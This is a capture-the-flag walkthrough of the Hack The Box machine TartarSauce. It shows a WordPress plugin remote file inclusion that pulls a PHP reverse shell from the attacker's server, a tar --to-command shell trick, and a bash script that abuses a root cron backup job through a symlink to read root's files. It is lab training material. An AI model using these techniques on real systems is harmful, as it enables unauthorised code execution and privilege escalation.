TartarSauce — HTB Walkthrough

Beware of RABBIT HOLE…..



Visiting the webpage

A Nikto scan running in the background

As per the nmap scan, we see we have a robots.txt file

One of the entries was working

Looking at Monstra 3.0.4 CMS exploits, we see they are authenticated

Enumerating the website, I found none of the links worked except Logged In, which redirects to the admin login page

So let’s go for Gobuster and Wfuzz. A Gobuster scan gives us the following: /webservices

Wfuzz gives us one more: backup
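The exact scan commands aren’t visible in the screenshots; typical invocations (target IP, wordlist path, and thread count are my assumptions) would look something like this:

```shell
# Hypothetical target and wordlist path -- adjust to your environment.
TARGET="http://10.10.10.88"
WORDLIST="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"

# Directory brute force with gobuster (v3 syntax); this turned up /webservices:
GOBUSTER_CMD="gobuster dir -u $TARGET -w $WORDLIST -t 40"
echo "$GOBUSTER_CMD"

# Fuzzing with wfuzz, hiding 404 responses; this turned up backup:
WFUZZ_CMD="wfuzz -c -z file,$WORDLIST --hc 404 $TARGET/FUZZ"
echo "$WFUZZ_CMD"
```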

Fuzzing backup and storage again, I see that storage gives the following

After a lot of unnecessary enumeration, I tried:

1) LFI

2) SQL injection

3) Brute force: I captured a request using admin:admin, and that actually worked as the username and password. GRRrrrrr!!!! What was this? Guesswork? Bad password policy? Or sheer luck… Whatever

Trying to upload a file and capturing the request in Burp

Now, as per the exploit, we change .php to .PHP and upload. This did not work

So we are still doing something wrong. This works with .php7

Again it didn’t work, so I enumerated and found that we are admin, while the exploit needs us to be an editor. Let’s create an editor user

Now we log in as editor, but again there is a problem: we don’t have access to the editor page. So I decided to change the admin’s role instead, by logging in as admin

We were in a big rabbit HOLE

A gobuster scan on /webservices (you see, I had overlooked scanning the webservices/ directory)

Running a wpscan
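The wpscan invocation itself isn’t shown; a typical one (URL and flags are my assumptions, wpscan v3 syntax) is:

```shell
# Hypothetical WordPress URL -- note the trailing slash.
WP_URL="http://10.10.10.88/webservices/wp/"

# Enumerate plugins (p) and users (u):
WPSCAN_CMD="wpscan --url $WP_URL --enumerate p,u"
echo "$WPSCAN_CMD"
```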

Vulnerable plugin detected:

On the Python server we see

It is looking for wp-load.php. Time to get a shell
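The Gwolle Guestbook (&lt; 1.5.4) RFI works because the plugin’s ajaxresponse.php appends the string wp-load.php to the attacker-controlled abspath GET parameter and require()s the result, so the target fetches our wp-load.php from the Python web server and executes it. A sketch of the request (IP addresses are assumptions):

```shell
# Hypothetical addresses -- adjust to your setup.
TARGET="http://10.10.10.88/webservices/wp"
LHOST="10.10.14.5"    # attacker box serving a PHP reverse shell saved as wp-load.php

# The plugin appends "wp-load.php" to whatever abspath points at:
RFI_URL="$TARGET/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://$LHOST/"
echo "curl '$RFI_URL'"
```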


And a curl request shows

On the server, checking the sudo rights of www-data

Now we write a script which gives a reverse shell. We pack the shell script into a tar file, then use tar --to-command to pipe the extracted output to the next process, i.e. /bin/sh
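The trick can be demonstrated locally: with GNU tar, --to-command pipes each extracted file’s contents to the given command’s stdin, so a shell script inside the archive executes when that command is /bin/sh. A minimal sketch (payload and filenames are mine):

```shell
# Minimal local demo of GNU tar's --to-command.
workdir=$(mktemp -d)
cd "$workdir"

# The payload: on the box this would be a netcat reverse-shell one-liner.
printf 'echo pwned-by-tar\n' > shell.sh

# Archive it, as we would on the target.
tar -cf shell.tar shell.sh

# Extraction pipes shell.sh's contents into /bin/sh, which runs them.
tar -xf shell.tar --to-command /bin/sh    # prints: pwned-by-tar
```

On TartarSauce the extraction step runs through sudo as the onuma user, which is what upgrades the shell.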

We get a shell on netcat


Enumerating processes using pspy32

Running pspy32

We see we have a cron job running /usr/bin/backuperer

What the script does: it tars all files in the basedir /var/www/html into a hidden tmpfile (something like /var/tmp/.&lt;random&gt;), sleeps for 30 seconds, then makes a temporary directory named check, extracts the tmpfile into it, and checks the integrity of the extracted files against the originals. If the check succeeds, it backs the archive up to /var/backups/onuma-www-dev.bak; otherwise it writes the differences to an error file.
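That flow can be sketched locally (directory names are stand-ins for /var/www/html and /var/tmp; the real script also sleeps 30 seconds between archiving and checking, which is the window the exploit below uses):

```shell
# Simplified sketch of backuperer's archive-and-verify logic.
basedir=$(mktemp -d)    # stands in for /var/www/html
vartmp=$(mktemp -d)     # stands in for /var/tmp
echo 'hello' > "$basedir/index.html"

# 1. Archive the web root into a hidden tmpfile.
tmpfile="$vartmp/.$$"
tar -zcf "$tmpfile" -C "$basedir" .

# (the real script sleeps 30 seconds here)

# 2. Extract into a check directory and diff against the original.
mkdir "$vartmp/check"
tar -zxf "$tmpfile" -C "$vartmp/check"
if diff -r "$basedir" "$vartmp/check" > /dev/null; then
    echo "integrity ok: copy archive to the backup file"
else
    echo "integrity failed: write the diff to the error log"
fi
```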

We can exploit this during the sleep window: extract the files from the tar, replace one of them with a symlink to /root/root.txt, then archive again. When the script runs its integrity check and finds a difference between the files before and after archiving, it writes both files’ data to the error file, which we can read.

So we will use 0xdf’s amazing script, which goes as follows.


#!/bin/bash

# work out of shm
cd /dev/shm

# set both start and cur equal to any backup file if it's there
start=$(find /var/tmp -maxdepth 1 -type f -name ".*")
cur=$(find /var/tmp -maxdepth 1 -type f -name ".*")

# loop until there's a change in cur
echo "Waiting for archive filename to change..."
while [ "$start" == "$cur" -o "$cur" == "" ] ; do
    sleep 10;
    cur=$(find /var/tmp -maxdepth 1 -type f -name ".*");
done

# Grab a copy of the archive
echo "File changed... copying here"
cp $cur .

# get filename
fn=$(echo $cur | cut -d'/' -f4)

# extract archive
tar -zxf $fn

# remove robots.txt and replace it with link to root.txt
rm var/www/html/robots.txt
ln -s /root/root.txt var/www/html/robots.txt

# remove old archive
rm $fn

# create new archive
tar czf $fn var

# put it back, and clean up
mv $fn $cur
rm -rf var

# wait for results
echo "Waiting for new logs..."
tail -f /var/backups/onuma_backup_error.txt

So we save this as .n00bDi.sh, transfer it to the victim machine, make it executable, and run it.

Wait five minutes and we get the root flag

ROOTED!!! Not literally though

OSCP | CEH | Cyber Security Enthusiast.